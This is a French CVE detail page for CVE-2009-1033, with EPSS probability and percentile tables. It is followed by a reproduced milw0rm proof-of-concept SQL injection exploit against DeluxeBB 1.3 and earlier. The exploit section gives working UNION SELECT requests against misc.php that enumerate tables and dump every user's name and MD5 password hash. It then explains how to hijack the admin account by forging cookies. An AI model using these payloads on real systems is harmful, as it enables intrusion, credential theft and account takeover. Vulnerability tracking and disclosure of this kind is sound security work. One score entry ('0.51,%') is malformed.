CVE-2009-1033 : Détail

Le modèle EPSS produit un score de probabilité compris entre 0 et 1 (0 et 100 %). Plus la note est élevée, plus la probabilité qu'une vulnérabilité soit exploitée est grande.

Date	EPSS V0	EPSS V1	EPSS V2 (> 2022-02-04)	EPSS V3 (> 2025-03-07)	EPSS V4 (> 2025-03-17)
2022-02-06	–	–	1.21%	–	–
2022-03-27	–	–	1.21%	–	–
2022-04-03	–	–	1.21%	–	–
2022-05-08	–	–	1.21%	–	–
2022-08-28	–	–	1.21%	–	–
2023-02-26	–	–	1.21%	–	–
2023-03-12	–	–	–	0.2%	–
2023-03-19	–	–	–	0.2%	–
2023-08-20	–	–	–	0.2%	–
2024-02-11	–	–	–	0.2%	–
2024-03-03	–	–	–	0.2%	–
2024-06-02	–	–	–	0.2%	–
2024-06-23	–	–	–	0.2%	–
2024-08-04	–	–	–	0.2%	–
2024-08-11	–	–	–	0.2%	–
2024-09-22	–	–	–	0.2%	–
2024-10-27	–	–	–	0.2%	–
2024-12-22	–	–	–	0.27%	–
2025-01-19	–	–	–	0.27%	–
2025-01-19	–	–	–	0.27%	–
2025-03-18	–	–	–	–	0.51%
2025-03-30	–	–	–	–	0.51%
2025-04-06	–	–	–	–	0.51%
2025-04-15	–	–	–	–	0.51%
2025-04-15	–	–	–	–	0.51,%

Le percentile est utilisé pour classer les CVE en fonction de leur score EPSS. Par exemple, une CVE dans le 95e percentile selon son score EPSS est plus susceptible d'être exploitée que 95 % des autres CVE. Ainsi, le percentile sert à comparer le score EPSS d'une CVE par rapport à d'autres CVE.

Date	Percentile
2022-02-06	41%
2022-03-27	42%
2022-04-03	64%
2022-05-08	65%
2022-08-28	66%
2023-02-26	67%
2023-03-12	56%
2023-03-19	57%
2023-08-20	58%
2024-02-11	57%
2024-03-03	58%
2024-06-02	58%
2024-06-23	59%
2024-08-04	58%
2024-08-11	59%
2024-09-22	58%
2024-10-27	59%
2024-12-22	67%
2025-01-19	68%
2025-01-19	68%
2025-03-18	64%
2025-03-30	63%
2025-04-06	64%
2025-04-15	65%
2025-04-15	65%

# Author: girex # Homepage: girex.altervista.org # Date: 18/03/2009 # CMS: DeluxeBB 1.3 and prior # site: deluxebb.com # NOTE: - Works regardless of php.ini settings - This SQL injection will shows you username and md5 of ALL registered users of the site. - This PoC was written for educational purpose. Use it at your own risk. Author will be not responsible for any damage. ---------------------------------------------------------------------------------------- # Vuln description: # DeluxeBB suffers many SQL Injections. They are caused, in part, by the extract() function # used in header.php. I think this is a very bad practice. Attacker doesn't need # register_globals turned On, and in this case that i'm showing you magic_quotes # turned Off too. # file: misc.php lines: 461-464 if($order == "name") { $qorder = "ORDER BY username"; } if($order == "regdate") { $qorder = "ORDER BY joineddate"; } if($order == "posts") { $qorder = "ORDER BY posts"; } if($order == "lastpost") { $qorder = "ORDER BY lastpost"; } # This sequence of if does not provide an else.. # file: misc.php line: 490 $getsel = $db->query("SELECT * FROM ".$prefix."users ".$qfilter." ".$qorder." <== ".$sort." LIMIT ".$pageinfo[0].",".$pageinfo[1]); # An attacker can set an arbitrary value to the var $qorder if $order # has a value not expected. ---------------------------------------------------------------------------------------- # PoC: # I reccomend to use first of all this SQL Injection to retrieve all table's name # of the database thanks to informatin_schema. You can use it to retrieve the table prefix # of the CMS. GET [target]/[path]/misc.php?sub=memberlist&order=1& qorder=UNION+ALL+SELECT+1,2,3,4,5,6,7,8,9,10,11,12,13,14,table_name,16,17,18,19,20,21,22,23,24,25,26,27,28,29+ FROM+information_schema.tables%23&sort=ASC&filter=all&searchuser=.&submit=1 ---------------------------------------------------------------------------------------- # Real PoC: # This SQL Injection will shows you ALL usernames and password hashes of the CMS. GET [target]/[path]/misc.php?sub=memberlist&order=1& qorder=UNION+ALL+SELECT+uid,username,3,4,membercode,6,7,8,9,10,11,12,13,14,pass,16,17,18,19,20,21,22,23,24,25,26,27,28,29+ FROM+deluxebb_users%23&sort=ASC&filter=all&searchuser=.&submit=1 ---------------------------------------------------------------------------------------- # NOTE: to get admin's access edit your cookies: # memberid => victim's id # membercookie => victim's username # memberpw => victim's md5 ---------------------------------------------------------------------------------------- girex # milw0rm.com [2009-03-18]